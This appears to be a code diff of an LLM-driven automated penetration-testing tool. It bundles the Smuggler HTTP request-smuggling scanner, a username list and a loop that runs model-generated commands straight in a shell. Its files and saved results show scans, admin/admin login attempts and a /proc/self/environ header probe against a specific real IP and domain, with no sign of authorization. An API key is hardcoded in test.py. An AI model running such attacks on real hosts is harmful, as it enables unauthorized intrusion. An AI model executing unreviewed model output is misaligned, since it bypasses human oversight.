payload/smuggler-master/payloads/README.md

@ -0,0 +1,3 @@
# Payloads Directory
When Smuggler finds a potential issue it will dump a PoC of the the request into this directory

445
payload/smuggler-master/smuggler.py

@ -0,0 +1,445 @@
#!/usr/bin/python3
# MIT License
#
# Copyright (c) 2020 Evan Custodio
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import argparse
import re
import time
import sys
import os
import random
import string
import importlib
import hashlib
from copy import deepcopy
from time import sleep
from datetime import datetime
from lib.Payload import Payload, Chunked, EndChunk
from lib.EasySSL import EasySSL
from lib.colorama import Fore, Style
from urllib.parse import urlparse
class Desyncr():
def __init__(self, configfile, smhost, smport=443, url="", method="POST", endpoint="/", SSLFlag=False, logh=None, smargs=None):
self._configfile = configfile
self._host = smhost
self._port = smport
self._method = method
self._endpoint = endpoint
self._vhost = smargs.vhost
self._url = url
self._timeout = float(smargs.timeout)
self.ssl_flag = SSLFlag
self._logh = logh
self._quiet = smargs.quiet
self._exit_early = smargs.exit_early
self._attempts = 0
self._cookies = []
def _test(self, payload_obj):
try:
web = EasySSL(self.ssl_flag)
web.connect(self._host, self._port, self._timeout)
web.send(str(payload_obj).encode())
#print(payload_obj)
start_time = datetime.now()
res = web.recv_nb(self._timeout)
end_time = datetime.now()
web.close()
if res is None:
delta_time = end_time - start_time
if delta_time.seconds < (self._timeout-1):
return (2, res, payload_obj) # Return mycode 2 if disconnected before timeout
return (1, res, payload_obj) # Return mycode 1 if connection timedout
# Filter out problematic characters
res_filtered = ""
for single in res:
if single > 0x7F:
res_filtered += '\x30'
else:
res_filtered += chr(single)
res = res_filtered
#if '504' in res:
#print("\n\n"+str(str(payload_obj)))
#print("\n\n"+res)
return (0, res, payload_obj) # Return mycode 0 if normal response returned
except Exception as exception_data:
#print(exception_data)
return (-1, None, payload_obj) # Return mycode -1 if some except occured
def _get_cookies(self):
RN = "\r\n"
try:
cookies = []
web = EasySSL(self.ssl_flag)
web.connect(self._host, self._port, 2.0)
p = Payload()
p.host = self._host
p.method = "GET"
p.endpoint = self._endpoint
p.header = "__METHOD__ __ENDPOINT__?cb=__RANDOM__ HTTP/1.1" + RN
p.header += "Host: __HOST__" + RN
p.header += "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36" + RN
p.header += "Content-type: application/x-www-form-urlencoded; charset=UTF-8" + RN
p.header += "Content-Length: 0" + RN
p.body = ""
#print (str(p))
web.send(str(p).encode())
sleep(0.5)
res = web.recv_nb(2.0)
web.close()
if (res is not None):
res = res.decode().split("\r\n")
for elem in res:
if len(elem) > 11:
if elem[0:11].lower().replace(" ", "") == "set-cookie:":
cookie = elem.lower().replace("set-cookie:","")
cookie = cookie.split(";")[0] + ';'
cookies += [cookie]
info = ((Fore.CYAN + str(len(cookies))+ Fore.MAGENTA), self._logh)
print_info("Cookies : %s (Appending to the attack)" % (info[0]))
self._cookies += cookies
return True
except Exception as exception_data:
error = ((Fore.CYAN + "Unable to connect to host"+ Fore.MAGENTA), self._logh)
print_info("Error : %s" % (error[0]))
return False
def run(self):
RN = "\r\n"
mutations = {}
if not self._get_cookies():
return
if (self._configfile[1] != '/'):
self._configfile = os.path.dirname(os.path.realpath(__file__)) + "/configs/" + self._configfile
try:
f = open(self._configfile)
except:
error = ((Fore.CYAN + "Cannot find config file"+ Fore.MAGENTA), self._logh)
print_info("Error : %s" % (error[0]))
exit(1)
script = f.read()
f.close()
exec(script)
for mutation_name in mutations.keys():
if self._create_exec_test(mutation_name, mutations[mutation_name]) and self._exit_early:
break
if self._quiet:
sys.stdout.write("\r"+" "*100+"\r")
# ptype == 0 (Attack payload, timeout could mean potential TECL desync)
# ptype == 1 (Edgecase payload, expected to work)
def _check_tecl(self, payload, ptype=0):
te_payload = deepcopy(payload)
if (self._vhost == ""):
te_payload.host = self._host
else:
te_payload.host = self._vhost
te_payload.method = self._method
te_payload.endpoint = self._endpoint
if len(self._cookies) > 0:
te_payload.header += "Cookie: " + ''.join(self._cookies) + "\r\n"
if not ptype:
te_payload.cl = 6 # timeout val == 6, good value == 5
else:
te_payload.cl = 5 # timeout val == 6, good value == 5
te_payload.body = EndChunk+"X"
#print (te_payload)
return self._test(te_payload)
# ptype == 0 (timeout payload, timeout could mean potential CLTE desync)
# ptype == 1 (Edgecase payload, expected to work)
def _check_clte(self, payload, ptype=0):
te_payload = deepcopy(payload)
if (self._vhost == ""):
te_payload.host = self._host
else:
te_payload.host = self._vhost
te_payload.method = self._method
te_payload.endpoint = self._endpoint
if len(self._cookies) > 0:
te_payload.header += "Cookie: " + ''.join(self._cookies) + "\r\n"
if not ptype:
te_payload.cl = 4 # timeout val == 4, good value == 11
else:
te_payload.cl = 11 # timeout val == 4, good value == 11
te_payload.body = Chunked("Z")+EndChunk
#print (te_payload)
return self._test(te_payload)
def _create_exec_test(self, name, te_payload):
def pretty_print(name, dismsg):
spacing = 13
sys.stdout.write("\r"+" "*100+"\r")
msg = Style.BRIGHT + Fore.MAGENTA + "[%s]%s: %s" % \
(Fore.CYAN + name + Fore.MAGENTA, " "*(spacing-len(name)), dismsg)
sys.stdout.write(CF(msg + Style.RESET_ALL))
sys.stdout.flush()
if dismsg[-1] == "\n":
ansi_escape = re.compile(r'\x1B[@-_][0-?]*[ -/]*[@-~]')
plaintext = ansi_escape.sub('', msg)
if self._logh is not None:
self._logh.write(plaintext)
self._logh.flush()
def write_payload(smhost, payload, ptype):
furl = smhost.replace('.', '_')
if (self.ssl_flag):
furl = "https_" + furl
else:
furl = "http_" + furl
if os.path.islink(sys.argv[0]):
_me = os.readlink(sys.argv[0])
else:
_me = sys.argv[0]
fname = os.path.realpath(os.path.dirname(_me)) + "/payloads/%s_%s_%s.txt" % (furl,ptype,name)
pretty_print("CRITICAL", "%s Payload: %s URL: %s\n" % \
(Fore.MAGENTA+ptype, Fore.CYAN+fname+Fore.MAGENTA, Fore.CYAN+self._url))
with open(fname, 'wb') as file:
file.write(bytes(str(payload),'utf-8'))
# First lets test TECL
pretty_print(name, "Checking TECL...")
start_time = time.time()
tecl_res = self._check_tecl(te_payload, 0)
tecl_time = time.time()-start_time
# Next lets test CLTE
pretty_print(name, "Checking CLTE...")
start_time = time.time()
clte_res = self._check_clte(te_payload, 0)
clte_time = time.time()-start_time
if (clte_res[0] == 1):
# Potential CLTE found
# Lets check the edge case to be sure
clte_res2 = self._check_clte(te_payload, 1)
if clte_res2[0] == 0:
self._attempts += 1
if (self._attempts < 3):
return self._create_exec_test(name, te_payload)
else:
dismsg = Fore.RED + "Potential CLTE Issue Found" + Fore.MAGENTA + " - " + Fore.CYAN + self._method + Fore.MAGENTA + " @ " + Fore.CYAN + ["http://","https://",][self.ssl_flag]+ self._host + self._endpoint + Fore.MAGENTA + " - " + Fore.CYAN + self._configfile.split('/')[-1] + "\n"
pretty_print(name, dismsg)
# Write payload out to file
write_payload(self._host, clte_res[2], "CLTE")
self._attempts = 0
return True
else:
# No edge behavior found
dismsg = Fore.YELLOW + "CLTE TIMEOUT ON BOTH LENGTH 4 AND 11" + ["\n", ""][self._quiet]
pretty_print(name, dismsg)
elif (tecl_res[0] == 1):
# Potential TECL found
# Lets check the edge case to be sure
tecl_res2 = self._check_tecl(te_payload, 1)
if tecl_res2[0] == 0:
self._attempts += 1
if (self._attempts < 3):
return self._create_exec_test(name, te_payload)
else:
#print (str(tecl_res2[2]))
#print (tecl_res2[1])
dismsg = Fore.RED + "Potential TECL Issue Found" + Fore.MAGENTA + " - " + Fore.CYAN + self._method + Fore.MAGENTA + " @ " + Fore.CYAN + ["http://","https://",][self.ssl_flag]+ self._host + self._endpoint + Fore.MAGENTA + " - " + Fore.CYAN + self._configfile.split('/')[-1] + "\n"
pretty_print(name, dismsg)
# Write payload out to file
write_payload(self._host, tecl_res[2], "TECL")
self._attempts = 0
return True
else:
# No edge behavior found
dismsg = Fore.YELLOW + "TECL TIMEOUT ON BOTH LENGTH 6 AND 5" + ["\n", ""][self._quiet]
pretty_print(name, dismsg)
#elif ((tecl_res[0] == 1) and (clte_res[0] == 1)):
# # Both types of payloads not supported
# dismsg = Fore.YELLOW + "NOT SUPPORTED" + ["\n", ""][self._quiet]
# pretty_print(name, dismsg)
elif ((tecl_res[0] == -1) or (clte_res[0] == -1)):
# ERROR
dismsg = Fore.YELLOW + "SOCKET ERROR" + ["\n", ""][self._quiet]
pretty_print(name, dismsg)
elif ((tecl_res[0] == 0) and (clte_res[0] == 0)):
# No Desync Found
tecl_msg = (Fore.MAGENTA + " (TECL: " + Fore.CYAN +"%.2f" + Fore.MAGENTA + " - " + \
Fore.CYAN +"%s" + Fore.MAGENTA + ")") % (tecl_time, tecl_res[1][9:9+3])
clte_msg = (Fore.MAGENTA + " (CLTE: " + Fore.CYAN +"%.2f" + Fore.MAGENTA + " - " + \
Fore.CYAN +"%s" + Fore.MAGENTA + ")") % (clte_time, clte_res[1][9:9+3])
dismsg = Fore.GREEN + "OK" + tecl_msg + clte_msg + ["\n", ""][self._quiet]
pretty_print(name, dismsg)
elif ((tecl_res[0] == 2) or (clte_res[0] == 2)):
# Disconnected
dismsg = Fore.YELLOW + "DISCONNECTED" + ["\n", ""][self._quiet]
pretty_print(name, dismsg)
self._attempts = 0
return False
def process_uri(uri):
u = urlparse(uri)
if u.scheme == "https":
ssl_flag = True
std_port = 443
elif u.scheme == "http":
ssl_flag = False
std_port = 80
else:
print_info("Error malformed URL not supported: %s" % (Fore.CYAN + uri))
exit(1)
if u.port:
return (u.hostname, u.port, u.path, ssl_flag)
else:
return (u.hostname, std_port, u.path, ssl_flag)
def CF(text):
global NOCOLOR
if NOCOLOR:
ansi_escape = re.compile(r'\x1B[@-_][0-?]*[ -/]*[@-~]')
text = ansi_escape.sub('', text)
return text
def banner(sm_version):
print(CF(Fore.CYAN))
print(CF(r" ______ _ "))
print(CF(r" / _____) | | "))
print(CF(r"( (____ ____ _ _ ____ ____| | _____ ____ "))
print(CF(r" \____ \| \| | | |/ _ |/ _ | || ___ |/ ___)"))
print(CF(r" _____) ) | | | |_| ( (_| ( (_| | || ____| | "))
print(CF(r"(______/|_|_|_|____/ \___ |\___ |\_)_____)_| "))
print(CF(r" (_____(_____| "))
print(CF(r""))
print(CF(r" @defparam %s"%(sm_version)))
print(CF(Style.RESET_ALL))
def print_info(msg, file_handle=None):
ansi_escape = re.compile(r'\x1B[@-_][0-?]*[ -/]*[@-~]')
msg = Style.BRIGHT + Fore.MAGENTA + "[%s] %s"%(Fore.CYAN+'+'+Fore.MAGENTA, msg) + Style.RESET_ALL
plaintext = ansi_escape.sub('', msg)
print(CF(msg))
if file_handle is not None:
file_handle.write(plaintext+"\n")
if __name__ == "__main__":
global NOCOLOR
if sys.version_info < (3, 0):
print("Error: Smuggler requires Python 3.x")
sys.exit(1)
Parser = argparse.ArgumentParser()
Parser.add_argument('-u', '--url', help="Target URL with Endpoint")
Parser.add_argument('-v', '--vhost', default="", help="Specify a virtual host")
Parser.add_argument('-x', '--exit_early', action='store_true',help="Exit scan on first finding")
Parser.add_argument('-m', '--method', default="POST", help="HTTP method to use (e.g GET, POST) Default: POST")
Parser.add_argument('-l', '--log', help="Specify a log file")
Parser.add_argument('-q', '--quiet', action='store_true', help="Quiet mode will only log issues found")
Parser.add_argument('-t', '--timeout', default=5.0, help="Socket timeout value Default: 5")
Parser.add_argument('--no-color', action='store_true', help="Suppress color codes")
Parser.add_argument('-c', '--configfile', default="default.py", help="Filepath to the configuration file of payloads")
Args = Parser.parse_args() # returns data from the options specified (echo)
NOCOLOR = Args.no_color
if os.name == 'nt':
NOCOLOR = True
Version = "v1.1"
banner(Version)
if sys.version_info < (3, 0):
print_info("Error: Smuggler requires Python 3.x")
sys.exit(1)
# If the URL argument is not specified then check stdin
if Args.url is None:
if sys.stdin.isatty():
print_info("Error: no direct URL or piped URL specified\n")
Parser.print_help()
exit(1)
Servers = sys.stdin.read().split("\n")
else:
Servers = [Args.url + " " + Args.method]
FileHandle = None
if Args.log is not None:
try:
FileHandle = open(Args.log, "w")
except:
print_info("Error: Issue with log file destination")
print(Parser.print_help())
sys.exit(1)
for server in Servers:
# If the next on the list is blank, continue
if server == "":
continue
# Tokenize
server = server.split(" ")
# This is for the stdin case, if no method was specified default to GET
if len(server) == 1:
server += [Args.method]
# If a protocol is not specified then default to https
if server[0].lower().strip()[0:4] != "http":
server[0] = "https://" + server[0]
host, port, endpoint, SSLFlagval = process_uri(server[0])
method = server[1].upper()
configfile = Args.configfile
print_info("URL : %s"%(Fore.CYAN + server[0]), FileHandle)
print_info("Method : %s"%(Fore.CYAN + method), FileHandle)
print_info("Endpoint : %s"%(Fore.CYAN + endpoint), FileHandle)
print_info("Configfile : %s"%(Fore.CYAN + configfile), FileHandle)
print_info("Timeout : %s"%(Fore.CYAN + str(float(Args.timeout)) + Fore.MAGENTA + " seconds"), FileHandle)
sm = Desyncr(configfile, host, port, url=server[0], method=method, endpoint=endpoint, SSLFlag=SSLFlagval, logh=FileHandle, smargs=Args)
sm.run()
if FileHandle is not None:
FileHandle.close()

3
payload/users

@ -0,0 +1,3 @@
root
admin
user

15
pipfile

@ -0,0 +1,15 @@
# -i https://pypi.tuna.tsinghua.edu.cn/simple/
pip install openai
pip install mysql-connector-python
pip install pymysql
apt install sublist3r
apt install gobuster
apt install jq
#smuggler
git clone https://github.com/defparam/smuggler.git
pip install beautifulsoup4
pip install cryptography
pip install loguru -i https://pypi.tuna.tsinghua.edu.cn/simple/

30
res

@ -0,0 +1,30 @@
执行指令:curl -kv -i https://58.216.217.70 --connect-timeout 10的结果是:HTTP 状态行:HTTP/1.1 202 OK,Content-Type:text/html,HTML Title:SoftEther VPN Server,TLS 连接信息:TLS1.3 / ECDHE_RSA_AES_256_GCM_SHA384,证书 Common Name:crnn.f3322.net,证书 Issuer:CN=crnn.f3322.net,O=crnn,OU=tech,C=cn,ST=jiangsu,L=changzhou。
执行指令:openssl s_client -connect 58.216.217.70:443 -showcerts的结果是:[{'subject': '<Name(CN=crnn.f3322.net,O=crnn,OU=tech,C=cn,ST=jiangsu,L=changzhou)>', 'issuer': '<Name(CN=crnn.f3322.net,O=crnn,OU=tech,C=cn,ST=jiangsu,L=changzhou)>', 'san': '[]', 'validity': {'start': '2015-07-01 01:31:10', 'end': '2025-06-28 01:31:10'}, 'signature_algorithm': 'sha256WithRSAEncryption'}]。
执行指令:nmap -p10001 -sV --script=default,banner 58.216.217.70的结果是:Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-08 16:48 CST
Nmap scan report for 58.216.217.70
Host is up (0.0014s latency).
PORT STATE SERVICE VERSION
10001/tcp open scp-config?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, Kerberos, RPCCheck, RTSPRequest, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe:
| HTTP/1.1 400
| Date: Sat, 08 Mar 2025 08:48:49 GMT
| Connection: close
| FourOhFourRequest, HTTPOptions:
| HTTP/1.1 404
| Content-Length: 0
| Date: Sat, 08 Mar 2025 08:48:49 GMT
| Connection: close
| GetRequest:
| HTTP/1.1 404
| Content-Length: 0
| Date: Sat, 08 Mar 2025 08:48:44 GMT
| Connection: close
| JavaRMI, ZendJavaBridge:
| HTTP/1.1 400
| Date: Sat, 08 Mar 2025 08:48:44 GMT
|_ Connection: close
1 service unrecognized despite returning data. 。
请根据这些结果生成下一步具体的指令。

1
test

File diff suppressed because one or more lines are too long

86
test.py

@ -0,0 +1,86 @@
import openai
import subprocess
# 设置OpenAI API密钥
openai.api_key = "fGBYaQLHykBOQsFwVrQdIFTsYr8YDtDVDQWFU41mFsmvfNPc"
# 初始化阶段和已知信息
current_stage = "信息收集"
known_info = {"url": "www.test.com"}
results = [] # 存储所有任务结果,用于生成报告
# 构建初始提示
def build_initial_prompt(stage, known_info):
return f"你是一个渗透测试专家,正在对网站{known_info['url']}进行渗透测试。当前阶段是{stage},已知信息是{known_info}。请生成下一步的指令。"
# 构建反馈提示
def build_feedback_prompt(instruction, result):
return f"执行指令“{instruction}”的结果是“{result}”。请根据这个结果生成下一步的指令。"
# 调用LLM生成指令
def get_llm_instruction(prompt):
response = openai.Completion.create(
engine="deepseek-r1", # 替换为你的模型
prompt=prompt,
max_tokens=100
)
return response.choices[0].text.strip()
# 执行指令
def execute_instruction(instruction):
# 示例:支持Nmap和dirb指令
if "nmap" in instruction:
try:
result = subprocess.run(instruction, shell=True, capture_output=True, text=True)
return result.stdout if result.stdout else result.stderr
except Exception as e:
return f"执行失败:{str(e)}"
elif "dirb" in instruction:
try:
result = subprocess.run(instruction, shell=True, capture_output=True, text=True)
return result.stdout if result.stdout else result.stderr
except Exception as e:
return f"执行失败:{str(e)}"
else:
return "未知指令,请重新生成。"
# 主循环
while current_stage != "报告生成":
# 构建提示并获取指令
if not results: # 第一次执行
prompt = build_initial_prompt(current_stage, known_info)
else: # 反馈结果
prompt = build_feedback_prompt(last_instruction, last_result)
instruction = get_llm_instruction(prompt)
print(f"生成的指令:{instruction}")
# 执行指令
task_result = execute_instruction(instruction)
print(f"任务结果:{task_result}")
results.append({"instruction": instruction, "result": task_result})
# 更新变量
last_instruction = instruction
last_result = task_result
# 示例阶段更新逻辑(可根据实际结果调整)
if current_stage == "信息收集" and "开放端口" in task_result:
current_stage = "漏洞扫描"
known_info["ports"] = "80, 443" # 示例更新已知信息
elif current_stage == "漏洞扫描" and "扫描完成" in task_result:
current_stage = "漏洞利用"
# 添加更多阶段切换逻辑
# 生成测试报告
report = "渗透测试报告\n"
report += f"目标网站:{known_info['url']}\n"
report += "测试结果:\n"
for res in results:
report += f"指令:{res['instruction']}\n结果:{res['result']}\n\n"
print(report)

286
tools/CurlTool.py

@ -0,0 +1,286 @@
import requests
import shlex
import re
import json
from bs4 import BeautifulSoup
from tools.ToolBase import ToolBase
class CurlTool(ToolBase):
# def __init__(self):
# super.__init__()
# self.headers = {}
# self.url = None
# self.verify_ssl = True
#解析指令到requests
def parse_curl_to_requests(self,curl_command):
# Split command preserving quoted strings
parts = shlex.split(curl_command)
if parts[0] != 'curl':
raise ValueError("Command must start with 'curl'")
# Parse curl flags and arguments
i = 1
while i < len(parts):
arg = parts[i]
if arg == '-k' or arg == '--insecure':
self.verify_ssl = False
i += 1
elif arg == '-s' or arg == '--silent':
# Silencing isn't needed for requests, just skip
i += 1
elif arg == '-H' or arg == '--header':
if i + 1 >= len(parts):
raise ValueError("Missing header value after -H")
header_str = parts[i + 1]
header_name, header_value = header_str.split(':', 1)
self.headers[header_name.strip()] = header_value.strip()
i += 2
elif not arg.startswith('-'):
if self.url is None:
self.url = arg
i += 1
else:
i += 1
if self.url is None:
raise ValueError("No URL found in curl command")
#return url, headers, verify_ssl
def validate_instruction(self, instruction_old):
#instruction = instruction_old
#指令过滤
timeout = 0
#添加-i 返回信息头
parts = instruction_old.split()
if 'base64 -d' in instruction_old:
return instruction_old
if '-i' not in parts and '--include' not in parts:
url_index = next((i for i, p in enumerate(parts) if p.startswith(('http://', 'https://'))), None)
if url_index is not None:
# 在URL前插入 -i 参数‌:ml-citation{ref="1" data="citationList"}
parts.insert(url_index, '-i')
else:
# 无URL时直接在末尾添加
parts.append('-i')
return ' '.join(parts),timeout
# def execute_instruction(self, instruction_old):
# '''
# 执行指令:验证合法性 -> 执行 -> 分析结果
# :param instruction_old:
# :return:
# bool:true-正常返回给大模型,false-结果不返回给大模型
# str:执行的指令
# str:执行指令的结果
# '''
#
# # 第一步:验证指令合法性
# instruction = self.validate_instruction(instruction_old)
# if not instruction:
# return False,instruction_old,"该指令暂不执行!"
#
# # 第二步:执行指令 --- 基于request使用
# #print(f"执行指令:{instruction}")
# output = ""
#
# # 第三步:分析执行结果
# analysis = self.analyze_result(output,instruction)
# #指令和结果入数据库
# #?
# if not analysis: #analysis为“” 不提交LLM
# return False,instruction,analysis
# return True,instruction, analysis
def get_ssl_info(self,stderr,stdout):
# --------------------------
# 解释信息的安全意义:
#
# - 如果证书的 Common Name 与请求的 IP 不匹配(如这里的 'crnn.f3322.net'),
# 则可能表明服务隐藏了真实身份或存在配置错误,这在后续攻击中可以作为信息收集的一部分。
#
# - TLS 连接信息(如 TLS1.3 和加密套件)有助于判断是否存在弱加密或旧版协议问题。
#
# - HTTP 状态和 Content-Type 帮助确认返回的是一个合法的 Web 服务,
# 而 HTML Title 暗示了实际运行的是 SoftEther VPN Server,可能存在默认配置或已知漏洞。
#
# 这些信息可以作为进一步探测、漏洞验证和渗透测试的依据。
# --------------------------
# 从 stderr 中提取证书及 TLS 信息
# 提取 Common Name(CN)
cn_match = re.search(r"common name:\s*([^\s]+)", stderr, re.IGNORECASE)
cert_cn = cn_match.group(1) if cn_match else "N/A"
# 提取 TLS 连接信息(例如 TLS1.3 及加密套件)
tls_match = re.search(r"SSL connection using\s+([^\n]+)", stderr, re.IGNORECASE)
tls_info = tls_match.group(1).strip() if tls_match else "N/A"
# 提取 Issuer 信息
issuer_match = re.search(r"issuer:\s*(.+)", stderr, re.IGNORECASE)
issuer_info = issuer_match.group(1).strip() if issuer_match else "N/A"
# 从 stdout 中提取 HTTP 响应头和 HTML 标题
# 分离 HTTP 头部和 body(假设头部与 body 用两个换行符分隔)
parts = stdout.split("\n\n", 1)
headers_part = parts[0]
body_part = parts[1] if len(parts) > 1 else ""
# 从头部中提取状态行和部分常见头部信息
lines = headers_part.splitlines()
http_status = lines[0] if lines else "N/A"
content_type_match = re.search(r"Content-Type:\s*(.*)", headers_part, re.IGNORECASE)
content_type = content_type_match.group(1).strip() if content_type_match else "N/A"
# 使用 BeautifulSoup 提取 HTML <title>
soup = BeautifulSoup(body_part, "html.parser")
html_title = soup.title.string.strip() if soup.title and soup.title.string else "N/A"
# --------------------------
# 输出提取的信息
# print("=== 提取的有用信息 ===")
# print("HTTP 状态行:", http_status)
# print("Content-Type:", content_type)
# print("HTML Title:", html_title)
# print("TLS 连接信息:", tls_info)
# print("证书 Common Name:", cert_cn)
# print("证书 Issuer:", issuer_info)
result = f"HTTP 状态行:{http_status},Content-Type:{content_type},HTML Title:{html_title},TLS 连接信息:{tls_info},证书 Common Name:{cert_cn},证书 Issuer:{issuer_info}"
return result
def get_info_xpost(self,stdout,stderr):
"""
subprocess.run 执行 curl 后的结果中提取关键信息
- HTTP 状态码
- 常见响应头Content-Type, Content-Length
- HTML 页面标题如果内容为 HTML
- 返回正文的前200字符body_snippet
- TLS/证书相关信息从详细调试信息 stderr 中提取
对于未匹配到的信息返回Not found或空字符串
"""
info = {}
# 处理 stdout: 拆分响应头与正文(假设用空行分隔)
parts = re.split(r'\r?\n\r?\n', stdout, maxsplit=1)
#***************解析方式一
# headers_str = parts[0] if parts else ""
# body = parts[1] if len(parts) > 1 else ""
#
# # 提取 HTTP 状态码(从响应头第一行中获取,例如 "HTTP/1.1 202 OK")
# header_lines = headers_str.splitlines()
# ***************解析方式二
if len(parts) == 2:
headers_str, body = parts
else:
# 如果没有拆分成功,可能 stdout 中只有正文,则从 stderr 尝试提取 HTTP 状态行
headers_str = ""
body = stdout
# 如果没有在 stdout 中找到头信息,则尝试从 stderr 中提取(部分信息可能在 stderr 中)
if not headers_str:
header_lines = stderr.splitlines()
else:
header_lines = headers_str.splitlines()
#**************************
if header_lines:
status_line = header_lines[0]
status_match = re.search(r'HTTP/\d+\.\d+\s+(\d+)', status_line)
info['status_code'] = status_match.group(1) if status_match else "Unknown"
else:
info['status_code'] = "No headers found"
# 提取常见响应头
content_type = "Not found"
content_length = "Not found"
for line in header_lines:
if line.lower().startswith("content-type:"):
info['content_type'] = line.split(":", 1)[1].strip()
elif line.lower().startswith("content-length:"):
info['content_length'] = line.split(":", 1)[1].strip()
# 如果未匹配到,则设置默认值
info.setdefault('content_type', "Not found")
info.setdefault('content_length', "Not found")
# 如果内容为 HTML,则使用 BeautifulSoup 提取 <title> 标签内容
if "html" in info['content_type'].lower():
try:
soup = BeautifulSoup(body, "html.parser")
if soup.title and soup.title.string:
info['html_title'] = soup.title.string.strip()
else:
info['html_title'] = "Not found"
except Exception as e:
info['html_title'] = f"Error: {e}"
else:
info['html_title'] = "N/A"
# 保存部分正文内容,便于后续分析
info['body_snippet'] = body[:200] # 前500字符
# 处理 stderr 中的 TLS/证书信息:只提取包含关键字的行
tls_info_lines = []
cert_info_lines = []
for line in stderr.splitlines():
# 过滤与 TLS/SSL 握手、证书相关的信息
if "SSL connection using" in line or "TLS" in line:
tls_info_lines.append(line.strip())
if "certificate" in line.lower():
cert_info_lines.append(line.strip())
info['tls_info'] = tls_info_lines if tls_info_lines else "Not found"
info['certificate_info'] = cert_info_lines if cert_info_lines else "Not found"
# 可选:保留完整的 verbose 信息以便后续分析
#info['verbose'] = stderr
#转换成字符串
result = json.dumps(info)
return result
def analyze_result(self, result,instruction,stderr,stdout):
#指令结果分析
if("-H "in instruction and "Host:" in instruction):# 基于证书域名进行跨站劫持
if "HTTP/1.1 200" in result: # and "<urlset" in result:
#result = "存在问题:成功通过 Host 头获取 sitemap 内容。"
result = "返回200,存在问题" #要进一步分析返回内容
else:
result = "未检测到问题"
elif("-H "in instruction and "Range:" in instruction):
if "HTTP/1.1 200 OK" in result:
result = "正常返回了200 OK页面"
elif "HTTP/1.1 416" in result:
if "Content-Range: bytes" in result:
result = "返回 416 且 Content-Range 正常:服务器对 Range 请求处理正确。"
elif "Content-Range:" in result:
result = "返回 416 但缺少或异常 Content-Range 头"
else:#"返回其他状态码(", response.status_code, "):需要进一步分析。"
result = "服务器对Range请求处理正确"
elif("-H "in instruction and "Referer:" in instruction):
if "HTTP/1.1 200" in result:
result="该漏洞无法利用"
else: #保留原结果
pass
elif("resource=config.php" in instruction):
if "base64: 无效的输入" in result:
result="该漏洞无法利用"
elif("Date:" in instruction): #保留原结果
print("")
elif("-kv https://" in instruction or "-vk https://" in instruction):
result = self.get_ssl_info(stderr,stdout)
elif("-X POST " in instruction):
result = self.get_info_xpost(stdout,stderr)
elif("-v " in instruction): #curl -v http://192.168.204.137:8180/manager/html --user admin:admin 常规解析curl返回内容
result = self.get_info_xpost(stdout,stderr)
else: #非处理命令的结果,暂时不提交LLM
result =""
return result
if __name__ =="__main__":
import subprocess
CT = CurlTool()
strinstruction = "curl -kv -X POST -d \"username=admin&password=admin\" https://58.216.217.70/vpn/index.html --connect-timeout 10"
instruction,time_out = CT.validate_instruction(strinstruction)
if instruction:
result = subprocess.run(instruction, shell=True, capture_output=True, text=True)
res = CT.analyze_result(result.stdout,instruction,result.stderr,result.stdout)
print(res)

19
tools/DigTool.py

@ -0,0 +1,19 @@
from tools.ToolBase import ToolBase
class DigTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):
#指令结果分析
return result
if __name__ == "__main__":
command = "nmap -sV -p- -T4 --min-rate 1000 haitutech.cn -oN nmap_scan.txt"
TB = DigTool()
bres, instr, output, output_old, ext_res = TB.execute_instruction("")
print(bres)
print(ext_res["test"])
print(ext_res["11"])

21
tools/EchoTool.py

@ -0,0 +1,21 @@
from tools.ToolBase import ToolBase
class EchoTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):
#指令结果分析
if "GET / HTTP/1.1" in result and "X-Original-URL: /proc/self/environ" in result:
#通过构造 ‌自定义HTTP请求头‌ 尝试利用服务器配置漏洞,访问敏感文件
if "HTTP/1.1 200" in result and "PATH=" in result:
#result = "存在安全问题" #暂时保留结果
pass
else:
result ="不存在安全问题"
else:#未预处理的情况,暂时不返回LLM
result = ""
return result

83
tools/FtpTool.py

@ -0,0 +1,83 @@
#Ftp
import ftplib
import re
import ipaddress
from tools.ToolBase import ToolBase
class FtpTool(ToolBase):
def is_ip_domain(self,str):
# IP 地址校验(支持 IPv4/IPv6)
try:
ipaddress.ip_address(str)
return True
except ValueError:
pass
# 域名格式校验
domain_pattern = re.compile(
r'^(?!(https?://|www\.|ftp://))' # 排除 URL 协议
r'([a-zA-Z0-9]([a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?\.)' # 子域名
r'+[a-zA-Z]{2,63}$' # 顶级域名(2-63个字母)
)
# 总长度校验(域名最大253字符)
return bool(domain_pattern.match(str)) and len(str) <= 253
def test_anonymous_ftp_login(self,host, username='anonymous', password='anonymous@example.com'):
try:
# 创建 FTP 客户端实例并连接服务器
ftp = ftplib.FTP(host)
# 尝试使用匿名凭据登录
ftp.login(username, password)
# 登录成功,打印消息
res = f"匿名登录成功: {host}"
# 关闭连接
ftp.quit()
except ftplib.all_errors as e:
# 登录失败,打印错误信息
res = f"匿名登录失败: {host} - {e}"
return res
def validate_instruction(self, instruction):
